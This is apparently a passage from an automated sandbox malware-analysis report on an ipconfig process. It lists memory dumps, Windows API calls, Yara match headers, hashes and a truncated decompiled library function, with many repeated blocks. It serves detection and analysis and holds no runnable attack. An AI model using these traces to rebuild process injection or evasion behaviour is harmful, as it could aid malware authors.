                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5090027532119802D114A1598444716040597D2341F51C821A0814558D87D588B17162
                                                                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000006.00000002.828813075.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 00000006.00000002.828813075.00000000033BB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000006.00000002.828813075.00000000033BF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_32a0000_ipconfig.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: cb0d93e4596875675984e3c2e1e261e9dccc703ef905b4f9093b96ddd7ad0e05
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 7e4f4e7b03f6a4cf3012dd24ef8c956eef3bc805024d37fd8df98ba9b656e37c
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: cb0d93e4596875675984e3c2e1e261e9dccc703ef905b4f9093b96ddd7ad0e05
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F990026522185442D204A5694C54B17040597D1343F51C525A0144554CCA5588716561
                                                                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000006.00000002.828813075.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 00000006.00000002.828813075.00000000033BB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000006.00000002.828813075.00000000033BF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_32a0000_ipconfig.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 2994545307-0
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000006.00000002.828813075.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
• Associated: 00000006.00000002.828813075.00000000033BB000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.828813075.00000000033BF000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_32a0000_ipconfig.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000006.00000002.828813075.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
• Associated: 00000006.00000002.828813075.00000000033BB000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.828813075.00000000033BF000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_32a0000_ipconfig.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000006.00000002.828813075.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
• Associated: 00000006.00000002.828813075.00000000033BB000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.828813075.00000000033BF000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_32a0000_ipconfig.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000006.00000002.828813075.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
• Associated: 00000006.00000002.828813075.00000000033BB000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.828813075.00000000033BF000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_32a0000_ipconfig.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000006.00000002.828813075.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
• Associated: 00000006.00000002.828813075.00000000033BB000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.828813075.00000000033BF000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_32a0000_ipconfig.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
                                                                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000006.00000002.828813075.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 00000006.00000002.828813075.00000000033BB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000006.00000002.828813075.00000000033BF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_32a0000_ipconfig.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000006.00000002.828813075.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 00000006.00000002.828813075.00000000033BB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000006.00000002.828813075.00000000033BF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_32a0000_ipconfig.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000006.00000002.828813075.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 00000006.00000002.828813075.00000000033BB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000006.00000002.828813075.00000000033BF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_32a0000_ipconfig.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000006.00000002.827381163.0000000000750000.00000040.80000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_750000_ipconfig.jbxd
                                                                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: ErrorMode
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 2340568224-0
                                                                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000006.00000002.827381163.0000000000750000.00000040.80000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_750000_ipconfig.jbxd
                                                                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: ErrorMode
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 2340568224-0
Uniqueness

Uniqueness Score: -1.00%

APIs
• CoInitialize.OLE32(00000000,00000000,?,00000000), ref: 00765277
Strings
Memory Dump Source
• Source File: 00000006.00000002.827381163.0000000000750000.00000040.80000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_750000_ipconfig.jbxd
Yara matches
Similarity
• API ID: Initialize
• String ID: @J7<$Wv
• API String ID: 2538663250-620054582
Uniqueness

Uniqueness Score: -1.00%

APIs
• Sleep.KERNELBASE(000007D0), ref: 0076B58B
Strings
Memory Dump Source
• Source File: 00000006.00000002.827381163.0000000000750000.00000040.80000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_750000_ipconfig.jbxd
Yara matches
Similarity
• API ID: Sleep
• String ID: net.dll$wininet.dll
• API String ID: 3472027048-1269752229
Uniqueness

Uniqueness Score: -1.00%

APIs
• Sleep.KERNELBASE(000007D0), ref: 0076B58B
Strings
Memory Dump Source
• Source File: 00000006.00000002.827381163.0000000000750000.00000040.80000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_750000_ipconfig.jbxd
Yara matches
Similarity
• API ID: Sleep
• String ID: net.dll$wininet.dll
• API String ID: 3472027048-1269752229
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetFileAttributesW.KERNELBASE(?), ref: 0075FE03
Strings
Memory Dump Source
• Source File: 00000006.00000002.827381163.0000000000750000.00000040.80000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_750000_ipconfig.jbxd
Yara matches
Similarity
• API ID: AttributesFile
• String ID: @
• API String ID: 3188754299-2766056989
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetFileAttributesW.KERNELBASE(rBv,?,?,00764272,00000000,?), ref: 0075E7FA
Strings
Memory Dump Source
• Source File: 00000006.00000002.827381163.0000000000750000.00000040.80000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_750000_ipconfig.jbxd
Yara matches
Similarity
• API ID: AttributesFile
• String ID: rBv
• API String ID: 3188754299-3541933218
Uniqueness

Uniqueness Score: -1.00%

APIs
• LookupPrivilegeValueW.ADVAPI32(00000000,?,"u,0075E122,?,00000000,?,?), ref: 0076CC20
Strings
Memory Dump Source
• Source File: 00000006.00000002.827381163.0000000000750000.00000040.80000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_750000_ipconfig.jbxd
Yara matches
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: LookupPrivilegeValue
                                                                                                                                                                                                                                                                                                                            • String ID: "u
                                                                                                                                                                                                                                                                                                                            • API String ID: 3899507212-1278817916
                                                                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • GetFileAttributesW.KERNELBASE(rBv,?,?,00764272,00000000,?), ref: 0075E7FA
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000006.00000002.827381163.0000000000750000.00000040.80000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_750000_ipconfig.jbxd
                                                                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: AttributesFile
                                                                                                                                                                                                                                                                                                                            • String ID: rBv
                                                                                                                                                                                                                                                                                                                            • API String ID: 3188754299-3541933218
                                                                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0075B1E2
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000006.00000002.827381163.0000000000750000.00000040.80000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_750000_ipconfig.jbxd
                                                                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: Load
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 2234796835-0
                                                                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • CreateThread.KERNELBASE(00000000,00000000,-00000002,1A3BA613,00000000,00000000,0075DDE2,?,?,?,1A3BA613,?), ref: 0076B652
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000006.00000002.827381163.0000000000750000.00000040.80000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_750000_ipconfig.jbxd
                                                                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: CreateThread
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 2422867632-0
                                                                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • CreateThread.KERNELBASE(00000000,00000000,-00000002,1A3BA613,00000000,00000000,0075DDE2,?,?,?,1A3BA613,?), ref: 0076B652
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000006.00000002.827381163.0000000000750000.00000040.80000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_750000_ipconfig.jbxd
                                                                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: CreateThread
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 2422867632-0
                                                                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • RtlFreeHeap.NTDLL(00000060,00000000,?,?,00000000,00000060,00000000,00000000,?,?,7BE2EBFA,00000000,?), ref: 0076CABD
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000006.00000002.827381163.0000000000750000.00000040.80000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_750000_ipconfig.jbxd
                                                                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: FreeHeap
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 3298025750-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 23a076b226fe51778b5763cad65316f8bf1a978e6f8bf853b8ff448c05f6660e
                                                                                                                                                                                                                                                                                                                            • Instruction ID: f95d816122153e4f6ba7572dd350201478bef1adb6c1cf6280be4d011b5bc048
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 23a076b226fe51778b5763cad65316f8bf1a978e6f8bf853b8ff448c05f6660e
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C0E01AB1200208ABCB14DF49DC49EA737ACEF88750F014054BD0957242C630E910CAB1
                                                                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • SetErrorMode.KERNELBASE(00008003,?,?,00758DAA,?), ref: 0075E601
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000006.00000002.827381163.0000000000750000.00000040.80000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_750000_ipconfig.jbxd
                                                                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: ErrorMode
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 2340568224-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 1b17c5891243f8f3adfc3b469a821885801ad8fbf1506d6a26ef0ba670c71a36
                                                                                                                                                                                                                                                                                                                            • Instruction ID: ada9062a48aedc6aa9ddb97036da62c9de5a37636b123f8848ef4c1bd4315244
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1b17c5891243f8f3adfc3b469a821885801ad8fbf1506d6a26ef0ba670c71a36
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 18D05EB27942047BF614E6E59C07F97328C8B087A6F044054FD0CD62C2D998F60085A9
                                                                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • SetErrorMode.KERNELBASE(00008003,?,?,00758DAA,?), ref: 0075E601
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000006.00000002.827381163.0000000000750000.00000040.80000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_750000_ipconfig.jbxd
                                                                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: ErrorMode
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 2340568224-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 171855e8e25285d5f472a9da0f000eb475fd14290037d7e29b628587b30456c2
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 7d5b00644c3dfc3562c83f90d1640cc0f506d8bd4f043c43115d08d2abb8ef2c
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 171855e8e25285d5f472a9da0f000eb475fd14290037d7e29b628587b30456c2
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 42B0126E34410294A66480F02C034E0250106401087098442605CC9A90EC4082160012
                                                                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000006.00000002.828813075.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 00000006.00000002.828813075.00000000033BB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000006.00000002.828813075.00000000033BF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_32a0000_ipconfig.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: c82f9ed7e762fc7a437cf33c84e4737eb32961c67e707d65443a6819a66697eb
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 696137f81102d98f3b0ad82853025af0ccf33900649c2fbc83be421f414786cf
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c82f9ed7e762fc7a437cf33c84e4737eb32961c67e707d65443a6819a66697eb
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 85B09B719014D9C6D615D7604A4872B7D0477D1751F16C5A1D1020645B4778C0A1F5B5
                                                                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                            C-Code - Quality: 88%
                                                                                                                                                                                                                                                                                                                            			E03395BA5(void* __ebx, signed char __ecx, signed int* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                                                                                                                                                                                                                            				signed int _t296;
                                                                                                                                                                                                                                                                                                                            				signed char _t298;
                                                                                                                                                                                                                                                                                                                            				signed int _t301;
                                                                                                                                                                                                                                                                                                                            				signed int _t306;
                                                                                                                                                                                                                                                                                                                            				signed int _t310;
                                                                                                                                                                                                                                                                                                                            				signed char _t311;
                                                                                                                                                                                                                                                                                                                            				intOrPtr _t312;
                                                                                                                                                                                                                                                                                                                            				signed int _t313;
                                                                                                                                                                                                                                                                                                                            				void* _t327;
                                                                                                                                                                                                                                                                                                                            				signed int _t328;
                                                                                                                                                                                                                                                                                                                            				intOrPtr _t329;
                                                                                                                                                                                                                                                                                                                            				intOrPtr _t333;
                                                                                                                                                                                                                                                                                                                            				signed char _t334;
                                                                                                                                                                                                                                                                                                                            				signed int _t336;
                                                                                                                                                                                                                                                                                                                            				void* _t339;
                                                                                                                                                                                                                                                                                                                            				signed int _t340;
                                                                                                                                                                                                                                                                                                                            				signed int _t356;
                                                                                                                                                                                                                                                                                                                            				signed int _t362;
				short _t367;
				short _t368;
				short _t373;
				signed int _t380;
				void* _t382;
				short _t385;
				signed short _t392;
				signed char _t393;
				signed int _t395;
				signed char _t397;
				signed int _t398;
				signed short _t402;
				void* _t406;
				signed int _t412;
				signed char _t414;
				signed short _t416;
				signed int _t421;
				signed char _t427;
				intOrPtr _t434;
				signed char _t435;
				signed int _t436;
				signed int _t442;
				signed int _t446;
				signed int _t447;
				signed int _t451;
				signed int _t453;
				signed int _t454;
				signed int _t455;
				intOrPtr _t456;
				intOrPtr* _t457;
				short _t458;
				signed short _t462;
				signed int _t469;
				intOrPtr* _t474;
				signed int _t475;
				signed int _t479;
				signed int _t480;
				signed int _t481;
				short _t485;
				signed int _t491;
				signed int* _t494;
				signed int _t498;
				signed int _t505;
				intOrPtr _t506;
				signed short _t508;
				signed int _t511;
				void* _t517;
				signed int _t519;
				signed int _t522;
				void* _t523;
				signed int _t524;
				void* _t528;
				signed int _t529;

				_push(0xd4);
				_push(0x33a1178);
				E0331D0E8(__ebx, __edi, __esi);
				_t494 = __edx;
				 *(_t528 - 0xcc) = __edx;
				_t511 = __ecx;
				 *((intOrPtr*)(_t528 - 0xb4)) = __ecx;
				 *(_t528 - 0xbc) = __ecx;
				 *((intOrPtr*)(_t528 - 0xc8)) =  *((intOrPtr*)(_t528 + 0x20));
				_t434 =  *((intOrPtr*)(_t528 + 0x24));
				 *((intOrPtr*)(_t528 - 0xc4)) = _t434;
				_t427 = 0;
				 *(_t528 - 0x74) = 0;
				 *(_t528 - 0x9c) = 0;
				 *(_t528 - 0x84) = 0;
				 *(_t528 - 0xac) = 0;
				 *(_t528 - 0x88) = 0;
				 *(_t528 - 0xa8) = 0;
				 *((intOrPtr*)(_t434 + 0x40)) = 0;
				if( *(_t528 + 0x1c) <= 0x80) {
					__eflags =  *(__ecx + 0xc0) & 0x00000004;
					if(__eflags != 0) {
						_t421 = E03394C56(0, __edx, __ecx, __eflags);
						__eflags = _t421;
						if(_t421 != 0) {
							 *((intOrPtr*)(_t528 - 4)) = 0;
							E0330D000(0x410);
							 *(_t528 - 0x18) = _t529;
							 *(_t528 - 0x9c) = _t529;
							 *((intOrPtr*)(_t528 - 4)) = 0xfffffffe;
							E03395542(_t528 - 0x9c, _t528 - 0x84);
						}
					}
					_t435 = _t427;
					 *(_t528 - 0xd0) = _t435;
					_t474 = _t511 + 0x65;
					 *((intOrPtr*)(_t528 - 0x94)) = _t474;
					_t511 = 0x18;
					while(1) {
						 *(_t528 - 0xa0) = _t427;
						 *(_t528 - 0xbc) = _t427;
						 *(_t528 - 0x80) = _t427;
						 *(_t528 - 0x78) = 0x50;
						 *(_t528 - 0x79) = _t427;
						 *(_t528 - 0x7a) = _t427;
						 *(_t528 - 0x8c) = _t427;
						 *(_t528 - 0x98) = _t427;
						 *(_t528 - 0x90) = _t427;
						 *(_t528 - 0xb0) = _t427;
						 *(_t528 - 0xb8) = _t427;
						_t296 = 1 << _t435;
						_t436 =  *(_t528 + 0xc) & 0x0000ffff;
                                                                                                                                                                                                                                                                                                                            						__eflags = _t436 & _t296;
                                                                                                                                                                                                                                                                                                                            						if((_t436 & _t296) != 0) {
                                                                                                                                                                                                                                                                                                                            							goto L92;
                                                                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                                                                            						__eflags =  *((char*)(_t474 - 1));
                                                                                                                                                                                                                                                                                                                            						if( *((char*)(_t474 - 1)) == 0) {
                                                                                                                                                                                                                                                                                                                            							goto L92;
                                                                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                                                                            						_t301 =  *_t474;
                                                                                                                                                                                                                                                                                                                            						__eflags = _t494[1] - _t301;
                                                                                                                                                                                                                                                                                                                            						if(_t494[1] <= _t301) {
                                                                                                                                                                                                                                                                                                                            							L10:
                                                                                                                                                                                                                                                                                                                            							__eflags =  *(_t474 - 5) & 0x00000040;
                                                                                                                                                                                                                                                                                                                            							if(( *(_t474 - 5) & 0x00000040) == 0) {
                                                                                                                                                                                                                                                                                                                            								L12:
                                                                                                                                                                                                                                                                                                                            								__eflags =  *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3];
